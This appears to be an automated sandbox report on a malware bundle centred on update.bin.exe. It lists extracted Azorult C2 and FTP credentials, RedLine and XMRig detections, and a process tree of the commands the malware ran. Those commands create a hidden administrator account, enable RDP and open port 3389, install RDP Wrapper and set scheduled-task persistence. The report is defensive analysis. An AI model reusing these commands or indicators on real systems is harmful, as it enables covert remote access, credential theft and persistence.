Resubmissions (3)
- 18/11/2020, 14:18 UTC: 201118-dj27sn3f52 (score 10)
- 18/11/2020, 13:42 UTC: 201118-1arz86e7w6 (score 10)
- 18/11/2020, 13:38 UTC: 201118-n8jh228ctn (score 10)

Analysis
- max time kernel: 61s
- max time network: 71s
- platform: windows10_x64
- resource: win10v20201028
- submitted: 18/11/2020, 13:38 UTC
Static task: static1

Behavioral tasks (every task runs on resource win10v20201028; the sample is listed for each):
- behavioral1: 2019-09-02_22-41-10.bin.exe
- behavioral2: 31.bin.exe
- behavioral3: 3DMark 11 Advanced Edition.bin.exe
- behavioral4: Archive.zip__ccacaxs2tbz2t6ob3e.bin.exe
- behavioral5: CVE-2018-15982_PoC.swf
- behavioral6: DiskInternals_Uneraser_v5_keygen.bin.exe
- behavioral7: ForceOp 2.8.7 - By RaiSence.bin.exe
- behavioral8: HYDRA.bin.exe
- behavioral9: Keygen.bin.exe
- behavioral10: LtHv0O2KZDK4M637.bin.exe
- behavioral11: OnlineInstaller.bin.exe
- behavioral12: Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.bin.exe
- behavioral13: Treasure.Vault.3D.Screensaver.keygen.by.Paradox.bin.exe
- behavioral14: VyprVPN.exe
- behavioral15: WSHSetup[1].bin.exe
- behavioral16: api.exe
- behavioral17: efd97b1038e063779fb32a3ab35adc481679a5c6c8e3f4f69c44987ff08b6ea4.js
- behavioral18: good.bin.exe
- behavioral19: infected dot net installer.bin.exe
- behavioral20: update.bin.exe
- behavioral21: vir1.xls
- behavioral22: xNet.dll
- behavioral23: 1.bin.exe
- behavioral24: VPN/VyprVPN.exe
- behavioral25: VPN/xNet.dll
- behavioral26: WSHSetup[1].bin.exe
Malware Config

Extracted (ftp)
- Protocol: ftp
- Host: 45.141.184.35
- Port: 21
- Username: alex
- Password: easypassword

Extracted (ftp)
- Protocol: ftp
- Host: 109.248.203.91
- Port: 21
- Username: alex
- Password: easypassword

Extracted (azorult)
- http://195.245.112.115/index.php
Signatures
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.

Modifies visibility of hidden/system files in Explorer (2 TTPs)

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload (2 IoCs)
- behavioral20/files/0x000200000001abe3-472.dat (yara_rule: family_redline)
- behavioral20/files/0x000200000001abe3-473.dat (yara_rule: family_redline)

ACProtect 1.3x - 1.4x DLL software (2 IoCs)
Detects file using ACProtect software.
- behavioral20/files/0x000100000001ab91-45.dat (yara_rule: acprotect)
- behavioral20/files/0x000100000001ab92-46.dat (yara_rule: acprotect)
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.

Grants admin privileges (1 TTPs)
Uses net.exe to modify the user's privileges.

XMRig Miner Payload (2 IoCs)
- behavioral20/files/0x000100000001abc2-500.dat (yara_rule: xmrig)
- behavioral20/files/0x000100000001abc2-519.dat (yara_rule: xmrig)

Matches of yara_rule aspack_v212_v242 (5 IoCs)
- behavioral20/files/0x000100000001ab8f-26.dat
- behavioral20/files/0x000100000001ab8f-25.dat
- behavioral20/files/0x000100000001ab8f-35.dat
- behavioral20/files/0x000100000001ab8f-39.dat
- behavioral20/files/0x000100000001ab8f-44.dat

Blocks application from running via registry modification
Adds application to list of disallowed applications.

Drops file in Drivers directory (2 IoCs)
- File opened for modification: C:\Windows\System32\drivers\etc\hosts (cmd.exe)
- File opened for modification: C:\Windows\System32\drivers\etc\hosts (update.bin.exe)
Executes dropped EXE (23 IoCs)
PID / process: 2400 wini.exe, 3636 winit.exe, 3312 rutserv.exe, 3948 cheat.exe, 2028 rutserv.exe, 1856 rutserv.exe, 2916 taskhost.exe, 3752 rutserv.exe, 4484 taskhost.exe, 4432 winlogon.exe, 4208 taskhostw.exe, 4900 R8.exe, 4936 Rar.exe, 1636 RDPWInst.exe, 2940 utorrent.exe, 4212 azur.exe, 4328 update.exe, 5028 RDPWInst.exe, 4988 system.exe, 4468 RDPWinst.exe, 4836 RDPWinst.exe, 4396 audiodg.exe, 4640 MicrosoftHost.exe

Modifies Windows Firewall (1 TTPs)

Sets DLL path for service in the registry (2 TTPs)

Stops running service(s) (3 TTPs)

Matches of yara_rule upx (8 IoCs)
- behavioral20/files/0x000100000001ab91-45.dat
- behavioral20/files/0x000100000001ab92-46.dat
- behavioral20/files/0x000100000001abb8-250.dat
- behavioral20/files/0x000100000001abb8-251.dat
- behavioral20/files/0x000200000001abd0-448.dat
- behavioral20/files/0x000200000001abd0-449.dat
- behavioral20/files/0x000100000001abe1-454.dat
- behavioral20/files/0x000100000001abe1-455.dat

Loads dropped DLL (6 IoCs)
PID / process: 4212 azur.exe (4 events), 4568 svchost.exe, 4424 svchost.exe

Modifies file permissions (1 TTPs, 56 IoCs)
All 56 events are icacls.exe; PIDs: 4808, 4472, 1304, 3472, 808, 3524, 4260, 5012, 1272, 2984, 1336, 2200, 4360, 4452, 4416, 4864, 3480, 2172, 5100, 3308, 4884, 4924, 948, 4620, 4544, 5072, 2236, 3460, 4036, 4188, 4464, 4444, 1956, 4820, 4980, 4948, 3936, 4296, 2120, 3980, 2156, 4312, 4700, 4940, 4144, 4784, 1476, 1284, 4748, 4580, 1880, 1932, 1384, 4108, 2020, 4556
Reads data files stored by FTP clients (2 TTPs)
Tries to access configuration files associated with programs like FileZilla.

Reads local data of messenger clients (2 TTPs)
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

Reads user/profile data of local email clients (2 TTPs)
Email clients store some user data on disk where infostealers will often target it.

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Adds Run key to start application (2 TTPs, 2 IoCs)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (taskhostw.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" (taskhostw.exe)

Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Legitimate hosting services abused for malware hosting/C2 (1 TTPs)

Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
- flow 17: ip-api.com
- flow 54: checkip.amazonaws.com
Modifies WinLogon (2 TTPs, 8 IoCs)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" (update.bin.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList (update.bin.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts (update.bin.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" (update.bin.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" (RDPWInst.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" (RDPWinst.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList (update.bin.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts (update.bin.exe)

Drops file in System32 directory (5 IoCs)
- File opened for modification: C:\Windows\SysWOW64\exe\rutserv.pdb (rutserv.exe)
- File opened for modification: C:\Windows\SysWOW64\symbols\exe\rutserv.pdb (rutserv.exe)
- File opened for modification: C:\Windows\System32\winmgmts:\localhost\root\CIMV2 (taskhost.exe)
- File opened for modification: C:\Windows\System32\winmgmts:\localhost\ (taskhost.exe)
- File opened for modification: C:\Windows\SysWOW64\rutserv.pdb (rutserv.exe)

Drops file in Program Files directory (31 IoCs)
- File opened for modification: C:\Program Files (x86)\Microsoft JDX (update.bin.exe)
- File opened for modification: C:\Program Files\Common Files\McAfee (update.bin.exe)
- File opened for modification: C:\Program Files\ESET (update.bin.exe)
- File created: C:\Program Files\RDP Wrapper\rdpwrap.ini (RDPWinst.exe)
- File opened for modification: C:\Program Files (x86)\360 (update.bin.exe)
- File opened for modification: C:\Program Files (x86)\SpyHunter (update.bin.exe)
- File opened for modification: C:\Program Files (x86)\AVAST Software (update.bin.exe)
- File created: C:\Program Files\RDP Wrapper\rdpwrap.dll (RDPWInst.exe)
- File opened for modification: C:\Program Files\RDP Wrapper\rdpwrap.dll (attrib.exe)
- File opened for modification: C:\Program Files\RDP Wrapper (attrib.exe)
- File opened for modification: C:\Program Files\Enigma Software Group (update.bin.exe)
- File opened for modification: C:\Program Files\SpyHunter (update.bin.exe)
- File opened for modification: C:\Program Files\AVG (update.bin.exe)
- File opened for modification: C:\Program Files\RDP Wrapper\rdpwrap.ini (utorrent.exe)
- File opened for modification: C:\Program Files\RDP Wrapper (utorrent.exe)
- File created: C:\Program Files\RDP Wrapper\rdpwrap.dll (RDPWinst.exe)
- File opened for modification: C:\Program Files (x86)\Cezurity (update.bin.exe)
- File created: C:\Program Files\RDP Wrapper\rdpwrap.ini (RDPWInst.exe)
- File opened for modification: C:\Program Files\Cezurity (update.bin.exe)
- File opened for modification: C:\Program Files (x86)\GRIZZLY Antivirus (update.bin.exe)
- File created: C:\Program Files\RDP Wrapper\rdpwrap.ini (utorrent.exe)
- File opened for modification: C:\Program Files (x86)\Kaspersky Lab (update.bin.exe)
- File opened for modification: C:\Program Files\RDP Wrapper\rdpwrap.ini (attrib.exe)
- File created: C:\Program Files\Common Files\System\iediagcmd.exe (update.bin.exe)
- File opened for modification: C:\Program Files\ByteFence (update.bin.exe)
- File opened for modification: C:\Program Files\COMODO (update.bin.exe)
- File opened for modification: C:\Program Files (x86)\AVG (update.bin.exe)
- File opened for modification: C:\Program Files\Kaspersky Lab (update.bin.exe)
- File opened for modification: C:\Program Files (x86)\Panda Security (update.bin.exe)
- File opened for modification: C:\Program Files\Malwarebytes (update.bin.exe)
- File opened for modification: C:\Program Files\AVAST Software (update.bin.exe)
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Checks processor information in registry (2 TTPs, 4 IoCs)
Processor information is often read in order to detect sandboxing environments.
- Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (winit.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (winit.exe)
- Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (azur.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (azur.exe)

Creates scheduled task(s) (1 TTPs, 7 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
PID / process: 4960 schtasks.exe, 5036 schtasks.exe, 3136 schtasks.exe, 2412 schtasks.exe, 476 schtasks.exe, 2936 schtasks.exe, 4664 schtasks.exe

Delays execution with timeout.exe (6 IoCs)
PID / process: 5088 timeout.exe, 3464 timeout.exe, 4400 timeout.exe, 4228 timeout.exe, 2816 timeout.exe, 4880 timeout.exe

Gathers network information (2 TTPs, 1 IoCs)
Uses commandline utility to view network configuration.
PID / process: 4424 ipconfig.exe

Kills process with taskkill (3 IoCs)
PID / process: 4324 taskkill.exe, 4332 taskkill.exe, 5000 taskkill.exe

Modifies registry class (6 IoCs)
- Key created: \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings (cmd.exe)
- Key created: \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings (wini.exe)
- Key created: \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\MIME\Database (winit.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset (winit.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage (winit.exe)
- Key created: \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings (R8.exe)

NTFS ADS (3 IoCs)
- File opened for modification: C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\ (taskhost.exe)
- File opened for modification: C:\Users\Admin\AppData\Local\Temp\WinMgmts:\ (update.bin.exe)
- File opened for modification: C:\Users\Admin\AppData\Local\Temp\WinMgmts:\ (utorrent.exe)

Runs .reg file with regedit (2 IoCs)
PID / process: 3888 regedit.exe, 3168 regedit.exe

Runs net.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
PID / process (repeated events collapsed): 4012 update.bin.exe (10 events), 3312 rutserv.exe (6), 2028 rutserv.exe (2), 1856 rutserv.exe (2), 3752 rutserv.exe (8), 3636 winit.exe (36)

Suspicious behavior: GetForegroundWindowSpam (2 IoCs)
PID / process: 4484 taskhost.exe, 4208 taskhostw.exe

Suspicious behavior: LoadsDriver (3 IoCs)
PID / process: 624 "Process not Found" (3 events)

Suspicious use of AdjustPrivilegeToken (16 IoCs)
- Token: SeDebugPrivilege, PID 3312 rutserv.exe
- Token: SeDebugPrivilege, PID 1856 rutserv.exe
- Token: SeTakeOwnershipPrivilege, PID 3752 rutserv.exe
- Token: SeTcbPrivilege, PID 3752 rutserv.exe
- Token: SeTcbPrivilege, PID 3752 rutserv.exe
- Token: SeDebugPrivilege, PID 4324 taskkill.exe
- Token: SeDebugPrivilege, PID 4332 taskkill.exe
- Token: SeDebugPrivilege, PID 5000 taskkill.exe
- Token: SeDebugPrivilege, PID 1636 RDPWInst.exe
- Token: SeAuditPrivilege, PID 4568 svchost.exe
- Token: SeDebugPrivilege, PID 4988 system.exe
- Token: SeDebugPrivilege, PID 4468 RDPWinst.exe
- Token: SeDebugPrivilege, PID 4836 RDPWinst.exe
- Token: SeAuditPrivilege, PID 4424 svchost.exe
- Token: SeLockMemoryPrivilege, PID 4640 MicrosoftHost.exe
- Token: SeLockMemoryPrivilege, PID 4640 MicrosoftHost.exe

Suspicious use of FindShellTrayWindow (3 IoCs)
PID / process: 4328 update.exe (3 events)

Suspicious use of SendNotifyMessage (3 IoCs)
PID / process: 4328 update.exe (3 events)

Suspicious use of SetWindowsHookEx (11 IoCs)
PID / process: 3636 winit.exe, 3312 rutserv.exe, 2028 rutserv.exe, 2916 taskhost.exe, 1856 rutserv.exe, 3752 rutserv.exe, 2240 WinMail.exe, 4104 WinMail.exe, 4208 taskhostw.exe, 4900 R8.exe, 4328 update.exe

Suspicious use of WriteProcessMemory (64 IoCs)
Each line gives source PID and process, the target PID written to, and the procid_target column; repeated events are collapsed.
- PID 4012 update.bin.exe wrote to memory of PID 2400 (procid_target 75), 3 events
- PID 2400 wini.exe wrote to memory of PID 3140 (procid_target 76), 3 events
- PID 2400 wini.exe wrote to memory of PID 3636 (procid_target 77), 3 events
- PID 3140 WScript.exe wrote to memory of PID 3664 (procid_target 79), 3 events
- PID 3664 cmd.exe wrote to memory of PID 3888 (procid_target 81), 3 events
- PID 3664 cmd.exe wrote to memory of PID 3168 (procid_target 82), 3 events
- PID 3664 cmd.exe wrote to memory of PID 3464 (procid_target 83), 3 events
- PID 3664 cmd.exe wrote to memory of PID 3312 (procid_target 87), 3 events
- PID 4012 update.bin.exe wrote to memory of PID 3948 (procid_target 88), 3 events
- PID 3664 cmd.exe wrote to memory of PID 2028 (procid_target 89), 3 events
- PID 3948 cheat.exe wrote to memory of PID 2916 (procid_target 90), 3 events
- PID 3664 cmd.exe wrote to memory of PID 1856 (procid_target 91), 3 events
- PID 4012 update.bin.exe wrote to memory of PID 3136 (procid_target 92), 3 events
- PID 4012 update.bin.exe wrote to memory of PID 2412 (procid_target 94), 3 events
- PID 4012 update.bin.exe wrote to memory of PID 476 (procid_target 97), 3 events
- PID 3664 cmd.exe wrote to memory of PID 2312 (procid_target 99), 3 events
- PID 3664 cmd.exe wrote to memory of PID 1328 (procid_target 100), 3 events
- PID 3664 cmd.exe wrote to memory of PID 2488 (procid_target 101), 3 events
- PID 4012 update.bin.exe wrote to memory of PID 2936 (procid_target 102), 3 events
- PID 4012 update.bin.exe wrote to memory of PID 1528 (procid_target 103), 3 events
- PID 3664 cmd.exe wrote to memory of PID 3124 (procid_target 106), 3 events
- PID 1528 cmd.exe wrote to memory of PID 3996 (procid_target 107), 1 event

Views/modifies file attributes (1 TTPs, 5 IoCs)
PID / process: 2312 attrib.exe, 1328 attrib.exe, 5052 attrib.exe, 4672 attrib.exe, 1508 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\update.bin.exe"C:\Users\Admin\AppData\Local\Temp\update.bin.exe"1⤵
- Drops file in Drivers directory
- Modifies WinLogon
- Drops file in Program Files directory
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4012 -
C:\ProgramData\Microsoft\Intel\wini.exeC:\ProgramData\Microsoft\Intel\wini.exe -pnaxui2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2400 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:3140 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:3664 -
C:\Windows\SysWOW64\regedit.exeregedit /s "reg1.reg"5⤵
- Runs .reg file with regedit
PID:3888
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg2.reg"5⤵
- Runs .reg file with regedit
PID:3168
-
-
C:\Windows\SysWOW64\timeout.exetimeout 25⤵
- Delays execution with timeout.exe
PID:3464
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /silentinstall5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3312
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /firewall5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2028
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /start5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1856
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows\*.*5⤵
- Views/modifies file attributes
PID:2312
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows5⤵
- Views/modifies file attributes
PID:1328
-
-
C:\Windows\SysWOW64\sc.exesc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/10005⤵PID:2488
-
-
C:\Windows\SysWOW64\sc.exesc config RManService obj= LocalSystem type= interact type= own5⤵PID:3124
-
-
C:\Windows\SysWOW64\sc.exesc config RManService DisplayName= "Microsoft Framework"5⤵PID:2772
-
-
-
-
C:\ProgramData\Windows\winit.exe"C:\ProgramData\Windows\winit.exe"3⤵
- Executes dropped EXE
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3636 -
C:\Program Files (x86)\Windows Mail\WinMail.exe"C:\Program Files (x86)\Windows Mail\WinMail" OCInstallUserConfigOE4⤵
- Suspicious use of SetWindowsHookEx
PID:2240 -
C:\Program Files\Windows Mail\WinMail.exe"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE5⤵
- Suspicious use of SetWindowsHookEx
PID:4104
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat4⤵PID:4320
-
C:\Windows\SysWOW64\timeout.exetimeout 55⤵
- Delays execution with timeout.exe
PID:4400
-
-
-
-
-
C:\programdata\install\cheat.exeC:\programdata\install\cheat.exe -pnaxui2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3948 -
C:\ProgramData\Microsoft\Intel\taskhost.exe"C:\ProgramData\Microsoft\Intel\taskhost.exe"3⤵
- Executes dropped EXE
- NTFS ADS
- Suspicious use of SetWindowsHookEx
PID:2916 -
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4208
-
-
C:\ProgramData\Microsoft\Intel\R8.exeC:\ProgramData\Microsoft\Intel\R8.exe4⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4900 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"5⤵PID:5016
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "6⤵
- Modifies registry class
PID:4116 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4324
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4332
-
-
C:\Windows\SysWOW64\timeout.exetimeout 37⤵
- Delays execution with timeout.exe
PID:4228
-
-
C:\Windows\SysWOW64\chcp.comchcp 12517⤵PID:4832
-
-
C:\rdp\Rar.exe"Rar.exe" e -p555 db.rar7⤵
- Executes dropped EXE
PID:4936
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5000
-
-
C:\Windows\SysWOW64\timeout.exetimeout 27⤵
- Delays execution with timeout.exe
PID:2816
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"7⤵PID:4120
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "8⤵PID:4140
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f9⤵PID:4388
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f9⤵PID:4456
-
-
C:\Windows\SysWOW64\netsh.exenetsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow9⤵PID:188
-
-
C:\Windows\SysWOW64\net.exenet.exe user "john" "12345" /add9⤵PID:4476
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user "john" "12345" /add10⤵PID:4300
-
-
-
C:\Windows\SysWOW64\chcp.comchcp 12519⤵PID:4584
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Администраторы" "John" /add9⤵PID:4532
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" "John" /add10⤵PID:4612
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administratorzy" "John" /add9⤵PID:4676
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administratorzy" "John" /add10⤵PID:2820
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administrators" John /add9⤵PID:4844
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administrators" John /add10⤵PID:5116
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administradores" John /add9⤵PID:4020
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administradores" John /add10⤵PID:5092
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add9⤵PID:5104
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add10⤵PID:4412
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного управления" John /add9⤵PID:3652
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add10⤵PID:4972
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" John /add9⤵PID:4288
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add10⤵PID:4480
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Usuarios de escritorio remoto" John /add9⤵PID:1940
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add10⤵PID:4384
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Uzytkownicy pulpitu zdalnego" John /add9⤵PID:4316
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add10⤵PID:4744
-
-
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -i -o9⤵
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:1636 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow10⤵PID:5112
-
-
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -w9⤵
- Executes dropped EXE
PID:5028
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f9⤵PID:4200
-
-
C:\Windows\SysWOW64\net.exenet accounts /maxpwage:unlimited9⤵PID:2192
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /maxpwage:unlimited10⤵PID:4220
-
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper\*.*"9⤵
- Drops file in Program Files directory
- Views/modifies file attributes
PID:5052
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper"9⤵
- Drops file in Program Files directory
- Views/modifies file attributes
PID:4672
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\rdp"9⤵
- Views/modifies file attributes
PID:1508
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 27⤵
- Delays execution with timeout.exe
PID:4880
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat4⤵
- Drops file in Drivers directory
PID:4436
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:4664
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:4960
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:5036
-
-
C:\ProgramData\WindowsTask\update.exeC:\ProgramData\WindowsTask\update.exe4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4328
-
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST2⤵
- Creates scheduled task(s)
PID:3136
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST2⤵
- Creates scheduled task(s)
PID:2412
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhost" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST2⤵
- Creates scheduled task(s)
PID:476
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhostw" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST2⤵
- Creates scheduled task(s)
PID:2936
-
-
  C:\Windows\SysWOW64\cmd.exe [depth 2] -> C:\Windows\SysWOW64\sc.exe [depth 3]
